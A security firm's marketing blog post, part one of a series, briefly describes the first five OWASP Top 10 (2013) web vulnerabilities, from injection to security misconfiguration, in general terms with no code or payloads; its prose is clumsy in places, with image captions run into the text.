Top 10 OWASP Vulnerabilities (Part 1)


OWASP Top 10 - 2013


Clarity - open web application security specialistsIn this day and age, insecure software is one of the single biggest threats to our way of life. Diffident configurations of software can undermine our financial, energy, defense, healthcare, and basically any other critical infrastructure. As our digital framework becomes increasingly complex, the trouble of achieving application security increases exponentially. Luckily, organizations like the Open Web Application Security Project (OWASP for short) help raise awareness by identifying the most critical risks facing organizations today. At Clarity, we will examine how OWASP impacts our community and explain how you can benefit.

What is OWASP?

Clarity uses OWASP 10, 12, etc.The Open Web Application Security Project is a non-profit organization devoted to improving the security of software. This open community is dedicated to enable organizations to develop, purchase, and maintain trustworthy applications. OWASP provides application security standards, cutting edge research, and a plethora of informative tools to help strengthen software operations.


OWASP Top 10

In 2013, OWASP updated their Top 10 project in hopes of enlightening technology leaders to become conscious of the latest web vulnerabilities. These software susceptibilities evolve over time as delinquents become smarter and tools change. Below are the Top 10 web exposures that could be impacting your business.

 

1) Injection

 

Clarity | owasp protects against untrusted security injectionsUntrusted data can have negative ramifications if not addressed appropriately. Injection flaws, such as SQL, OS, and LDAP injection occur when insecure data is delivered to an interpreter as part of a command or query. The attacker’s hostile data can hoax the translator into performing unintended commands or accessing data without proper authorization.

 

2) Broken Authentication and Session Management

 

Clarity | owasp protects against broken authentication managementApplication functions related to authentication and session management are often implemented incorrectly, allowing invaders to compromise passwords, keystrokes, session tokens, or to exploit other implementation flaws to assume other users’ identities.

 

3) Cross-Site Scripting (XSS)

 

Clarity | owasp protects against cross-site scripting XSSXSS flaws occur whenever an application takes untrusted data and relays it to a web browser without proper validation. XSS allows attackers to execute scripts in the victim’s browser which can steal user sessions, deface web sites, and redirect the user to malicious sites.

 

4) Insecure Direct Object References

 

Clarity | owasp protects against insecure direct object referencesA direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

 

5) Security Misconfiguration

 

Clarity | owasp protects against security misconfigurationsGreat security requires having a protected configuration defined and deployed for not only the application, but the frameworks, application server, web server, database server, and platform. Secure settings must be defined, implemented, and maintained, as defaults are frequently insecure. Additionally, software should update regularly.

Learn the top 6-10 vulnerabilities and how you can strengthen your organization.